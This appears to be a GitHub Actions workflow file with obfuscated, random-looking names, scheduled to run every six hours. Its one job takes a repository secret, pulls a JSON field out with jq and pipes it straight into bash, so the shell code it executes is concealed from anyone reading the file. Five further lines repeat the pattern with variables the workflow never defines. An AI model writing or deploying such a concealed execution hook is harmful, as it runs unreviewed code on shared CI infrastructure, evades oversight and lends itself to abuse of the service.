name: ludishen9910

on:
  workflow_dispatch:
  schedule:
    - cron: '0 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: ludishen9910
        env:
          gnzvl3: ${{ secrets.gnzvl3 }}
        run: |
          echo $gnzvl3 | jq -r .uvet17 | /bin/bash
          echo $ae11312 | jq -r .u110 | /bin/bash
          echo $arl0616 | jq -r .zop35 | /bin/bash
          echo $gh4121 | jq -r .vwzaz51720 | /bin/bash
          echo $x2 | jq -r .xdbqi29758 | /bin/bash
          echo $rem75 | jq -r .hr2 | /bin/bash

